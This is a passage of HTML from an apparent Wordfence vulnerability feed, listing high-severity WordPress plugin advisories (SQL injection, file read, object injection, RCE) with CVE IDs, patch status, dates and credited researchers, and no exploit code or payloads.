<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ni-woocommerce-sales-report" target="_blank" rel="noopener">Ni WooCommerce Sales Report – Orders, Revenue &amp; Sales Analytics Dashboard</a> <span class="wfvr-software-slug">[ni-woocommerce-sales-report]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f380b48-9939-4066-a563-eea66b252cae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6af015f-f954-4afb-9d65-56176f73672f" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System &lt;= 28.1 &#8211; Insecure Direct Object Reference to Unauthenticated Sensitive Data Access and Message Injection via &#8216;conversation_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89063" target="_blank" rel="noopener noreferrer">							CVE-2026-89063						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jtb75" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a50fdfd0923a437363689c1971acafda.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a50fdfd0923a437363689c1971acafda"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jtb75" target="_blank" rel="noopener">jtb75</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6af015f-f954-4afb-9d65-56176f73672f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/957ace25-786f-41d7-9fcb-dec41a662fd4" target="_blank" rel="noopener">Price Drop Alert for WooCommerce &lt;= 1.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87770" target="_blank" rel="noopener noreferrer">							CVE-2026-87770						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-price-drop-alert" target="_blank" rel="noopener">Price Drop Alert for Woo Commerce</a> <span class="wfvr-software-slug">[woo-price-drop-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b091b6dca7c1378c156dc35baaa50f5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b091b6dca7c1378c156dc35baaa50f5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener">Theo Antônio Da Fonseca</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/957ace25-786f-41d7-9fcb-dec41a662fd4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d050a44-41ac-46ac-ba2e-406bfaebec69" target="_blank" rel="noopener">Printcart Web to Print Product Designer for WooCommerce &lt;= 2.8.5 &#8211; Unauthenticated Arbitrary File Read via &#8216;folder&#8217; and &#8216;mockups&#8217; Parameters</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14323" target="_blank" rel="noopener noreferrer">							CVE-2026-14323						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/printcart-integration" target="_blank" rel="noopener">Printcart Store – Web to Print Product Designer for WooCommerce</a> <span class="wfvr-software-slug">[printcart-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d050a44-41ac-46ac-ba2e-406bfaebec69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee19a8e-5204-4577-ab0d-ca8c13247c49" target="_blank" rel="noopener">Product Question and Answer &lt;= 1.1.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87771" target="_blank" rel="noopener noreferrer">							CVE-2026-87771						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-question-and-answer" target="_blank" rel="noopener">Product Question and Answer</a> <span class="wfvr-software-slug">[product-question-and-answer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b091b6dca7c1378c156dc35baaa50f5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b091b6dca7c1378c156dc35baaa50f5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener">Theo Antônio Da Fonseca</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee19a8e-5204-4577-ab0d-ca8c13247c49" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1c29af8-f298-4efa-b5a2-fd48ba9613ee" target="_blank" rel="noopener">SAMO Forms &lt;= 1.0.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80491" target="_blank" rel="noopener noreferrer">							CVE-2026-80491						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/samo-forms" target="_blank" rel="noopener">SAMO Forms</a> <span class="wfvr-software-slug">[samo-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1c29af8-f298-4efa-b5a2-fd48ba9613ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82e6abde-b826-4dd9-81bb-89b6549b3789" target="_blank" rel="noopener">Shortcut Link &lt;= 1.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87767" target="_blank" rel="noopener noreferrer">							CVE-2026-87767						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-shortcut-link" target="_blank" rel="noopener">wp shortcut link and advertisement baner</a> <span class="wfvr-software-slug">[wp-shortcut-link]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b091b6dca7c1378c156dc35baaa50f5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b091b6dca7c1378c156dc35baaa50f5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener">Theo Antônio Da Fonseca</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82e6abde-b826-4dd9-81bb-89b6549b3789" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f50a3b7-4110-4f24-ba9a-2c3114392295" target="_blank" rel="noopener">Tz Weekly Radio Schedule &lt;= 1.8.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87775" target="_blank" rel="noopener noreferrer">							CVE-2026-87775						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tz-wrs-core" target="_blank" rel="noopener">Tz Weekly Radio Schedule</a> <span class="wfvr-software-slug">[tz-wrs-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f50a3b7-4110-4f24-ba9a-2c3114392295" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07c41a9d-9c16-4d0c-a966-91ea5299847a" target="_blank" rel="noopener">Tz Weekly Radio Schedule &lt;= 1.8.1 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87774" target="_blank" rel="noopener noreferrer">							CVE-2026-87774						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tz-wrs-core" target="_blank" rel="noopener">Tz Weekly Radio Schedule</a> <span class="wfvr-software-slug">[tz-wrs-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b091b6dca7c1378c156dc35baaa50f5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b091b6dca7c1378c156dc35baaa50f5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theo-antonio-da-fonseca" target="_blank" rel="noopener">Theo Antônio Da Fonseca</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07c41a9d-9c16-4d0c-a966-91ea5299847a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e706174-ff6a-4093-af36-bac55097df50" target="_blank" rel="noopener">Unlimited Elements For Elementor &lt;= 2.0.19 &#8211; Authenticated (Subscriber+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85017" target="_blank" rel="noopener noreferrer">							CVE-2026-85017						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">Unlimited Elements For Elementor</a> <span class="wfvr-software-slug">[unlimited-elements-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e706174-ff6a-4093-af36-bac55097df50" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62022a7d-26b5-4278-81d4-44526dce47fe" target="_blank" rel="noopener">VikRentItems Flexible Rental Management System &lt;= 1.2.3 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88926" target="_blank" rel="noopener noreferrer">							CVE-2026-88926						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikrentitems" target="_blank" rel="noopener">VikRentItems Flexible Rental Management System</a> <span class="wfvr-software-slug">[vikrentitems]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd20b99aec2d2287d2a86d71af4da7e5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd20b99aec2d2287d2a86d71af4da7e5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener">Shhriyash</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62022a7d-26b5-4278-81d4-44526dce47fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/107f19b5-b67d-4242-b312-531c31b9a73c" target="_blank" rel="noopener">WCFM Marketplace &lt;= 3.8.2 &#8211; Unauthenticated SQL Injection via &#8216;wcfmmp_user_location_lat&#8217; / &#8216;wcfmmp_user_location_lng&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18442" target="_blank" rel="noopener noreferrer">							CVE-2026-18442						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">WCFM Marketplace – Multivendor Marketplace for WooCommerce</a> <span class="wfvr-software-slug">[wc-multivendor-marketplace]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/107f19b5-b67d-4242-b312-531c31b9a73c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d18fd2a8-a95c-40e2-bf35-333ee853639d" target="_blank" rel="noopener">WP Multi Store Locator Pro &lt;= 4.5.1 &#8211; Unauthenticated SQL Injection via &#8216;store_locator_search_radius&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15275" target="_blank" rel="noopener noreferrer">							CVE-2026-15275						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-multi-store-locator-pro" target="_blank" rel="noopener">WP Multi Store Locator Pro</a> <span class="wfvr-software-slug">[wp-multi-store-locator-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d18fd2a8-a95c-40e2-bf35-333ee853639d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/693c7554-5122-4527-8a9c-aa31ea9623b7" target="_blank" rel="noopener">WP Photo Album Plus &lt;= 9.2.09.002 &#8211; Authenticated (Subscriber+) Remote Code Execution via Multipart Upload Filename via ImageMagick Argument Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87909" target="_blank" rel="noopener noreferrer">							CVE-2026-87909						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">WP Photo Album Plus</a> <span class="wfvr-software-slug">[wp-photo-album-plus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/693c7554-5122-4527-8a9c-aa31ea9623b7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
